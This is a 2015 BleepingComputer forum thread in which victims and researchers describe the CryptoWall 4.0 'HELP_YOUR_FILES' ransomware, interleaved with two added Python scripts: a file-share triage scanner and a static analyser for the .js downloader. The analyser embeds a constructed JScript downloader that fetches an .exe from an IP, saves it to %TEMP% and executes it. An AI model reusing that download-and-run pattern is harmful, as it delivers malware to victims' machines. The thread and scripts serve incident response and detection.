
CryptoWall 4.0: Help_Your_Files Ransomware Support Topic


431 replies to this topic

#1 PresComm (Members, 109 posts)

Posted 03 November 2015 - 08:34 AM

Warning: some of the specific infection information provided in this topic on subsequent pages could trigger a warning or alert from your antivirus. Avast has already been reported to have done this.

Mod Edit by quietman7...12/22/15

 

Everybody,
 
Appy polly loggies if this is the wrong forum, move if needed.
 
I am working at a fast pace, and I will update with what artifacts and items I can as soon as possible, but I wanted to let everyone know that a client of ours was hit with a crypto family that is supposedly CryptoWall, but I am not entirely sure that is true.
 
There are "HELP_YOUR_FILES" .PNG files scattered across the system in affected directories, and it traversed SMB connections, too. The .PNG images give pay portal instructions, and it all looks like CryptoWall, but it usually uses "HELP_DECRYPT" files, and I don't see the .HTM or .TXT files with this one. In addition, and this is the big factor, all the files that were affected were completely and utterly renamed ("0ausbffwh.p5", "72lcvn.iv6nn", "x83o8x.ux7", etc.). Shadow Copies appear to have been obliterated, too. Internet searches for the artifact .PNG showed few results, and all of them are brand new.
 
Unfortunately, I was out of the office for the day when this occurred, and the technicians that handled it kinda just blasted things away, so I am trying my best to gather artifacts. I am grabbing the registry and file structure list, samples of encrypted files, browser history, logs from various anti-x tools, etc.
 
DecrypterFixer... if this is something you are interested in tackling, would having a copy of an encrypted file and a copy of the pre-encrypted file help? Not sure if that would expedite your usual processes. I am unfamiliar with your magic ways, so just let me know.


Edited by quietman7, 23 December 2015 - 08:02 AM.
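The symptoms in the post above (ransom-note PNGs dropped into affected directories, every victim file renamed to a random stem and extension, spread across SMB shares) are what a responder has to enumerate quickly across a file server. The Python script below is an added example, not code from this thread or from any tool mentioned in it. It turns the renamed-file shape quoted in the post into a filename regex (an assumption, not a published signature), confirms candidates with a byte-entropy check so ordinary short-named files are not reported, skips extensions that are legitimately near-random (an assumed list), collects the HELP_YOUR_FILES / HELP_DECRYPT notes, and counts hits per directory so the blast radius is visible. The sample tree it builds is constructed for the demonstration.

```python
import math
import os
import re
import tempfile
from collections import Counter
from pathlib import Path
from typing import Dict, Optional

# Shape of the renamed files quoted in the post ("0ausbffwh.p5", "72lcvn.iv6nn",
# "x83o8x.ux7"): short lowercase alphanumeric stem plus short lowercase
# alphanumeric extension. Turning that into a regex is an assumption for triage,
# not a published signature for this family.
RANDOM_NAME = re.compile(r"^[a-z0-9]{4,12}\.[a-z0-9]{2,6}$")

# Ransom-note stems named in the thread: HELP_YOUR_FILES for this variant,
# HELP_DECRYPT for earlier CryptoWall. Matched case-insensitively, any extension.
NOTE_STEMS = {"help_your_files", "help_decrypt"}

# Extensions whose content is legitimately near-random (compressed media and
# archives). Assumed list; it stops those files being reported as encrypted.
HIGH_ENTROPY_OK = {"png", "jpg", "jpeg", "gif", "zip", "7z", "gz", "rar",
                   "docx", "xlsx", "pptx", "pdf", "mp3", "mp4"}

ENTROPY_THRESHOLD = 7.5   # bits per byte; encrypted data sits close to 8.0
SAMPLE_BYTES = 64 * 1024  # only the head of each file is read


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(path: Path) -> Optional[str]:
    """Return 'note', 'encrypted' or None for one file."""
    name = path.name
    if name.split(".")[0].lower() in NOTE_STEMS:
        return "note"
    if not RANDOM_NAME.match(name):
        return None
    if name.rsplit(".", 1)[1] in HIGH_ENTROPY_OK:
        return None
    with path.open("rb") as fh:
        head = fh.read(SAMPLE_BYTES)
    return "encrypted" if shannon_entropy(head) >= ENTROPY_THRESHOLD else None


def triage(root: Path) -> Dict[str, object]:
    """Walk root read-only; collect notes, suspected encrypted files, hits per directory."""
    notes, encrypted, per_dir = [], [], Counter()
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            p = Path(dirpath) / fname
            kind = classify(p)
            if kind == "note":
                notes.append(p)
            elif kind == "encrypted":
                encrypted.append(p)
                per_dir[Path(dirpath)] += 1
    return {"notes": notes, "encrypted": encrypted, "per_dir": per_dir}


def build_sample_tree(base: Path) -> Path:
    """Constructed sample tree, not real artefacts: one note, two renamed files
    with random content, one clean text file, one legitimately high-entropy JPEG."""
    share = base / "share" / "finance"
    share.mkdir(parents=True)
    (share / "HELP_YOUR_FILES.PNG").write_bytes(b"\x89PNG\r\n\x1a\n" + os.urandom(512))
    (share / "x83o8x.ux7").write_bytes(os.urandom(4096))
    (share / "72lcvn.iv6nn").write_bytes(os.urandom(4096))
    (share / "budget.txt").write_bytes(b"FY2015 budget line item\n" * 200)
    (share / "photo.jpg").write_bytes(os.urandom(4096))
    return base


def run_sample() -> Dict[str, object]:
    """Build the constructed tree in a temp dir, triage it, return plain names."""
    with tempfile.TemporaryDirectory() as tmp:
        r = triage(build_sample_tree(Path(tmp)))
        return {
            "notes": sorted(p.name for p in r["notes"]),
            "encrypted": sorted(p.name for p in r["encrypted"]),
            "per_dir": {d.relative_to(tmp).as_posix(): n for d, n in r["per_dir"].items()},
        }


if __name__ == "__main__":
    for key, value in run_sample().items():
        print(f"{key}: {value}")
```

Run it from a clean host against the mapped share (it only reads file heads, so it does not disturb timestamps of content); point it at a real root instead of the constructed tree by calling `triage(Path(r"\\server\share"))`. It does not check Volume Shadow Copies, so a separate look at the affected host is still needed to confirm the "obliterated" observation in the post.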



#2 quietman7 (Bleepin' Janitor, Global Moderator, 49,566 posts, Virginia, USA)

Posted 03 November 2015 - 08:54 AM

I have advised our Security Colleagues who specialize in crypto malware ransomware with a link to this topic.
Microsoft MVP Consumer Security 2007-2015
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#3 PresComm (Topic Starter)

Posted 03 November 2015 - 08:58 AM

Thanks, quietman. I didn't want to reach out to them directly, because I am sure they are very busy.



#4 quietman7 (Bleepin' Janitor, Global Moderator)

Posted 03 November 2015 - 09:01 AM

Not a problem. Post any updates as you get them.

Please submit a sample of an encrypted file here (http://www.bleepingcomputer.com/submit-malware.php?channel=3) with a link to this topic:

You can also submit samples of suspicious executables or any malware files that you suspect were involved in causing the infection. Doing that will be helpful with analyzing and investigating.

#5 PresComm (Topic Starter)

Posted 03 November 2015 - 09:10 AM

A sample of an encrypted file was submitted, as was the "HELP_YOUR_FILES" .PNG artifact.



#6 PresComm (Topic Starter)

Posted 03 November 2015 - 09:17 AM

For the record, for the file that I submitted as the sample, I do have a copy of the decrypted file, if that will help.



#7 PresComm (Topic Starter)

Posted 03 November 2015 - 09:31 AM

Okay, I think I found the dropper/downloader for this. I will upload once I have confirmed. I do not have access to my sandbox at the moment, but when I do this evening I will run the sample and collect the downloaded/dropped payload. I will upload both the downloader/dropper and the payload once I have them.


Edited by PresComm, 03 November 2015 - 09:31 AM.


#8 PresComm (Topic Starter)

Posted 03 November 2015 - 10:12 AM

Confirmed that the .ZIP file I submitted was the downloader.



#9 White Hat Mike (Members, 312 posts)

Posted 03 November 2015 - 11:21 AM



> Confirmed that the .ZIP file I submitted was the downloader.

 

Could you upload the ZIP file to Mega and PM me the download link?


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#10 PresComm (Topic Starter)

Posted 03 November 2015 - 11:47 AM

Done. Let me know if you need more info.



#11 kiro_masamune (Members, 2 posts, USA)

Posted 03 November 2015 - 11:57 AM

Is there any more information on this as of yet? ESET Endpoint did not detect it. I can't tell if the agent is still on this machine. My co-worker found the email with the payload. It appears that it downloaded a file named yria.exe and renamed it to a random 9-digit number .exe. That's all I know so far.

 

If there is any other information needed, I can provide if I can.


Edited by kiro_masamune, 03 November 2015 - 11:58 AM.


#12 PresComm (Topic Starter)

Posted 03 November 2015 - 12:02 PM

ESET is now detecting the downloader, but it did not as of 1:13PM Eastern time yesterday when the infection chain took place for us. Haven't had a chance to play with it yet, because I don't have a sandbox here I can do it with.

 

If WHM or somebody else doesn't update before I get home, I'll run this in the lab. It is a safe bet, though, that your best bet is going to be to restore encrypted files from backup, which you hopefully have available.


Edited by PresComm, 03 November 2015 - 12:06 PM.


#13 Grinler (Lawrence Abrams, Admin, 43,166 posts, USA)

Posted 03 November 2015 - 12:03 PM

We are on it. Stay tuned.



#14 Passkeycs (Members, 6 posts)

Posted 03 November 2015 - 12:09 PM

We have this too! Let me know if you need samples. FYI, it left all the XLSX files alone. The owner on all files is "administrators". We have no sign of infected files on any workstations, and no one got any pop-ups.



#15 PresComm (Topic Starter)

Posted 03 November 2015 - 12:09 PM

Kiro, you are definitely seeing the same downloader. I took the time to just view the .JS file's contents, and I can clearly see it reaching out to a public IP and downloading a 9-digit named .EXE file.

 

It did not leave our client's .XLSX files alone, that is a certainty.


Edited by PresComm, 03 November 2015 - 12:10 PM.
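Posts #11 and #15 describe the downloader as a .js inside the mailed .ZIP that reaches out to a public IP and fetches an .exe which ends up under a nine-digit numeric name. The script below is an added example and not the sample from this thread: it runs a light static pass over a constructed JScript downloader, undoing two obfuscation tricks common in this kind of script (String.fromCharCode and string-literal concatenation) and resolving ProgIDs passed through variables, then pulls out the COM objects, URL, IP, dropped filename and whether the script executes what it saved. Everything in SAMPLE_JS is constructed for the demonstration: the IP is from the RFC 5737 documentation range and the numeric name is made up; only the yria.exe filename echoes what the thread reports.

```python
import re
from typing import Dict

# Constructed JScript downloader used as input (NOT the thread's sample). It has
# the shape the posts describe: fetch an .exe from a public IP, save it under a
# numeric name in %TEMP%, run it. 203.0.113.45 is a documentation-range address.
SAMPLE_JS = r'''
var a = "MSX" + "ML2.XM" + "LHTTP";
var h = "ht" + "tp://203.0.113." + "45/yri" + "a.exe";
var s = new ActiveXObject(a);
var t = new ActiveXObject(String.fromCharCode(65,68,79,68,66,46,83,116,114,101,97,109));
var w = new ActiveXObject("WScript.Shell");
var p = w.ExpandEnvironmentStrings("%TEMP%") + "\\" + 492817364 + ".exe";
s.open("GET", h, false);
s.send();
t.Open(); t.Type = 1; t.Write(s.ResponseBody); t.SaveToFile(p, 2); t.Close();
w.Run(p, 0, false);
'''

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')          # "a" + "b"
ASSIGN = re.compile(r'\bvar\s+(\w+)\s*=\s*"([^"\\]*)"\s*;')    # var x = "lit";
PROGID = re.compile(r'ActiveXObject\(\s*(?:"([^"]+)"|(\w+))\s*\)')
URL = re.compile(r'https?://[^\s"\']+')
IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
NUMERIC_EXE = re.compile(r'\b(\d{6,})\s*\+\s*"\.exe"')         # 123456789 + ".exe"
RUN_CALL = re.compile(r'\.Run\s*\(')


def decode_fromcharcode(src: str) -> str:
    """Replace String.fromCharCode(65,66,...) with the equivalent string literal."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return FROMCHARCODE.sub(repl, src)


def fold_concats(src: str) -> str:
    """Collapse "a" + "b" + "c" chains into one literal, repeating until stable."""
    while True:
        new = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if new == src:
            return src
        src = new


def extract_iocs(js: str) -> Dict[str, object]:
    """Normalise the script and report its observable behaviour without running it."""
    src = fold_concats(decode_fromcharcode(js))
    consts = dict(ASSIGN.findall(src))                 # variable -> string literal
    progids = set()
    for literal, ident in PROGID.findall(src):
        progids.add(literal or consts.get(ident, f"<unresolved:{ident}>"))
    urls = set(URL.findall(src))
    dropped = {f"{n}.exe" for n in NUMERIC_EXE.findall(src)}
    return {
        "progids": sorted(progids),
        "urls": sorted(urls),
        "ips": sorted(set(IPV4.findall(src))),
        "dropped": sorted(dropped),
        "runs_payload": bool(RUN_CALL.search(src)),
    }


def is_downloader(iocs: Dict[str, object]) -> bool:
    """Heuristic verdict: HTTP client + stream-to-disk + shell object + a URL."""
    p = set(iocs["progids"])
    http = any(x.upper().endswith("XMLHTTP") or x.upper().startswith("WINHTTP") for x in p)
    disk = "ADODB.Stream" in p
    shell = "WScript.Shell" in p or "Shell.Application" in p
    return http and disk and shell and bool(iocs["urls"])


if __name__ == "__main__":
    report = extract_iocs(SAMPLE_JS)
    for key, value in report.items():
        print(f"{key}: {value}")
    print("verdict:", "downloader" if is_downloader(report) else "inconclusive")
```

A pass like this gives you the C2 address and dropped name to block and hunt for within minutes, but it only handles the two obfuscations it knows about; a script that builds strings through eval, array indexing or arithmetic will come back with unresolved ProgIDs and no URL, and that result is inconclusive rather than clean. Detonating the .js in an isolated sandbox, as the thread starter planned, remains the confirmation step.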




